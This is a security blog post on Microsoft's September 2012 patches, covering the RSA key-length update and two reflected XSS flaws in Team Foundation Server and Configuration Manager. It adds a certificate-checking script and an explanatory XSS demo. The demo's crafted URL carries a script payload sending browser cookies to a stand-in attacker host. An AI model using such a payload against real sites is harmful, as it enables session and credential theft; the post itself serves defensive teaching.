SpiderLabs Blog

Microsoft Patch Tuesday September 2012 – Update those Certs!

As we mentioned last week, there are only two patches this month, and both are rated 'Important' rather than 'Critical'. That means less work for all of us, but it doesn't mean you should skip them where they apply. So few patches also means you can spend some time on this month's optional non-security update, KB2661254. It was first released last month, and just about everyone ignored it then. Once installed, KB2661254 makes Windows treat certificates with RSA keys shorter than 1024 bits as untrusted. For most of us that shouldn't be a big deal, as you really should already be using 1024-bit keys as a minimum by now anyway. But according to the 2012 Trustwave Global Security Report, at least 1% of you out there are still using 512-bit certificates! While you are in the process of updating those old certs, and you have all this extra time this month from only needing to apply two patches, you might as well update your 1024-bit certs to an even more robust 2048 bits, 4096 bits or higher.

There has been a lot of nasty malware out lately using spoofed certs, like the recent Flame malware. So while you have a little extra time this month, root around in the back of your IT closet for that old server that never gets touched because "it just works". You know the one: the one you avoid, the one in the corner that the other department is protective about, the one that lives under that one guy's desk. Yeah, that one. Go update it. If you are still using IIS 5 or 6 and not checking Certificate Revocation Lists, now would be a good time to enable that feature; it is on by default in IIS 7.

Be warned, though, that updating key lengths might cause some error messages and will definitely require a reboot. Just because updating your key lengths is optional this month doesn't mean you should ignore it or put it off any longer than you need to, because next month the update will be pushed as required and stuff will start breaking if you haven't dealt with your short keys. Things like Internet Explorer throwing error messages at your visitors saying your certs are untrusted. Things like Outlook not being able to encrypt or even sign email. Those issues are nothing, though, when you realize that Outlook 2010 won't even be able to connect to an Exchange Server using a cert with fewer than 1024 bits. So save yourself some headaches next month and update those key lengths now.
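Finding the certs the update will reject means reading the RSA modulus size out of every certificate in play. The block below is an added example written for this post, not code from the original article or from Microsoft: a small pure-Python DER walker that pulls the RSA key length out of a certificate, a pass/fail check against the 1024-bit floor the update enforces, and a constructed `build_test_cert` helper that emits an unsigned, certificate-shaped DER skeleton (not a real certificate) so the whole thing runs offline. The helper names are illustrative; feed `pem_to_der` the PEM files exported from your servers.

```python
"""Added example: report RSA certificates whose key is shorter than the KB2661254 floor."""
import base64
import re

MIN_RSA_BITS = 1024                                    # the minimum the update enforces
RSA_OID = bytes.fromhex("2a864886f70d010101")          # 1.2.840.113549.1.1.1 (rsaEncryption)


def _read_tlv(buf, pos=0):
    """Decode one DER tag-length-value at buf[pos]; return (tag, value, next_pos)."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:                                  # long-form length
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def _children(value):
    """Split the contents of a constructed element into its child (tag, value) pairs."""
    out, pos = [], 0
    while pos < len(value):
        tag, val, pos = _read_tlv(value, pos)
        out.append((tag, val))
    return out


def pem_to_der(text):
    """Strip the PEM armour from a certificate and return its DER bytes."""
    body = re.search(r"-----BEGIN CERTIFICATE-----(.*?)-----END CERTIFICATE-----", text, re.S).group(1)
    return base64.b64decode("".join(body.split()))


def der_to_pem(der):
    """Wrap DER bytes in PEM armour (the inverse of pem_to_der)."""
    b64 = base64.b64encode(der).decode()
    lines = "\n".join(b64[i:i + 64] for i in range(0, len(b64), 64))
    return "-----BEGIN CERTIFICATE-----\n" + lines + "\n-----END CERTIFICATE-----\n"


def rsa_key_bits(der):
    """Return the RSA modulus length in bits, or None when the certificate key is not RSA."""
    _, cert, _ = _read_tlv(der)                        # Certificate ::= SEQUENCE
    fields = _children(_children(cert)[0][1])          # tbsCertificate fields
    if fields[0][0] == 0xA0:                           # optional [0] EXPLICIT version
        fields = fields[1:]
    # serialNumber, signature, issuer, validity, subject, subjectPublicKeyInfo, ...
    alg, pubkey = _children(fields[5][1])[:2]
    if _children(alg[1])[0][1] != RSA_OID:
        return None
    _, rsa_pub, _ = _read_tlv(pubkey[1][1:])           # BIT STRING: skip the unused-bits octet
    modulus = _children(rsa_pub)[0][1]                 # RSAPublicKey ::= SEQUENCE { modulus, exponent }
    return int.from_bytes(modulus, "big").bit_length()


def check_cert(der, minimum=MIN_RSA_BITS):
    """'OK', 'non-RSA', or 'FAIL: ...' for one DER certificate."""
    bits = rsa_key_bits(der)
    if bits is None:
        return "non-RSA"
    return "OK" if bits >= minimum else f"FAIL: {bits}-bit RSA key (minimum {minimum})"


# --- constructed test data: a certificate-shaped DER skeleton, not a real or signed cert ---
def _tlv(tag, body):
    n = len(body)
    if n < 0x80:
        length = bytes([n])
    else:
        lb = n.to_bytes((n.bit_length() + 7) // 8, "big")
        length = bytes([0x80 | len(lb)]) + lb
    return bytes([tag]) + length + body


def _der_int(value):
    b = value.to_bytes((value.bit_length() + 7) // 8 or 1, "big")
    return _tlv(0x02, (b"\x00" + b) if b[0] & 0x80 else b)


def build_test_cert(modulus_bits):
    """Build an unsigned certificate skeleton carrying an RSA modulus of exactly modulus_bits bits."""
    modulus = (1 << (modulus_bits - 1)) | 1            # any odd number of the right size will do
    rsa_pub = _tlv(0x30, _der_int(modulus) + _der_int(65537))
    alg = _tlv(0x30, _tlv(0x06, RSA_OID) + b"\x05\x00")
    spki = _tlv(0x30, alg + _tlv(0x03, b"\x00" + rsa_pub))
    name = _tlv(0x30, b"")                             # empty Name; enough for the walker
    validity = _tlv(0x30, _tlv(0x17, b"120911000000Z") + _tlv(0x17, b"130911000000Z"))
    tbs = _tlv(0x30, _tlv(0xA0, _der_int(2)) + _der_int(1) + alg + name + validity + name + spki)
    return _tlv(0x30, tbs + alg + _tlv(0x03, b"\x00"))  # signature left empty


if __name__ == "__main__":
    for bits in (512, 1024, 2048):
        print(bits, check_cert(build_test_cert(bits)))
```

Anything that comes back FAIL is what the update will refuse. DSA and ECC keys return `non-RSA` because the update only concerns RSA key lengths, and the walker deliberately ignores signatures and extensions since only the SubjectPublicKeyInfo matters here.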

MS12-061 (KB 2719584)

Elevation of Privilege in Visual Studio Team Foundation Server

Visual Studio Team Foundation Server lets users easily share project plans, work products, progress assessments and a whole bunch of other stuff. There is a reflected XSS (Cross Site Scripting) vulnerability, though, that could allow a bad guy to inject a client-side script into a web browser that is using Team Foundation Server Web Access. Basically the bad guy inherits the victim's privileges if the user clicks a specially crafted link in an email or on a website. Once the script runs in the victim's browser, the bad guy could spoof content, steal information or do anything that the original user could do. If for some reason you can't apply this patch, at the very least enable the XSS filter for the Local intranet security zone in IE 8 and 9. You can find it from Tools -> Internet Options -> Security tab -> Local intranet -> Custom Level -> Settings -> Scripting -> Enable XSS filter. But it is so much easier to just apply the patch.

MS12-062 (KB 2741528)

Elevation of Privilege in System Center Configuration Manager

System Center Configuration Manager helps organizations maintain corporate compliance by managing physical, virtual and mobile clients with things like application delivery, desktop virtualization, security and other cool stuff. However, there is a vulnerability that can be exploited by tricking a user into visiting a specially crafted URL. Like MS12-061, this one is also a reflected XSS vulnerability, which could allow the bad guy's script to run in the victim's browser with that user's privileges. Again, if you can't install this patch, be sure to at least enable the XSS filter in IE 8 and 9.
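Both bulletins come down to the same bug class, so here is an added example of what "reflected" means. This is example code written for this post, not Microsoft's code and not how Team Foundation Server or Configuration Manager actually render their pages: a page handler that echoes a URL parameter into its HTML unencoded, beside the same handler with HTML-entity encoding on output, driven by a constructed crafted link. The host names and the `q` parameter are hypothetical. The IE XSS filter is a client-side mitigation for the unpatched case; the encoding shown in `render_hardened` is the server-side fix the patches deliver.

```python
"""Added example: reflected XSS, a handler that echoes a URL parameter raw versus HTML-encoded."""
import html
from urllib.parse import parse_qs, urlparse

# Constructed link of the kind the bulletins describe; hosts and parameter are hypothetical.
CRAFTED_URL = ("https://tfs.example.invalid/search?q="
               "%3Cscript%3Edocument.location%3D%27https://attacker.invalid/%3F%27"
               "%2Bdocument.cookie%3C/script%3E")


def query_param(url, name):
    """Return one query-string value as the server sees it after percent-decoding."""
    return parse_qs(urlparse(url).query).get(name, [""])[0]


def render_vulnerable(term):
    """Reflects the search term straight into the page; markup in it becomes live HTML."""
    return f"<html><body><p>Results for: {term}</p></body></html>"


def render_hardened(term):
    """Same page, but the untrusted value is entity-encoded before it is reflected."""
    return f"<html><body><p>Results for: {html.escape(term, quote=True)}</p></body></html>"


def reflects_script(page):
    """True when the response contains a script element the browser would execute."""
    return "<script" in page.lower()


if __name__ == "__main__":
    term = query_param(CRAFTED_URL, "q")
    print("vulnerable executes payload:", reflects_script(render_vulnerable(term)))
    print("hardened executes payload:  ", reflects_script(render_hardened(term)))
```

The payload rides entirely in the link, which is why the attacker needs a victim to click it and why the script then runs as that victim in the application.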

Researchers at Trustwave SpiderLabs are actively investigating these bulletins thoroughly, using the information from Microsoft and other sources to develop protections for our customers against these threats as quickly as we can.

Now, go update those certs!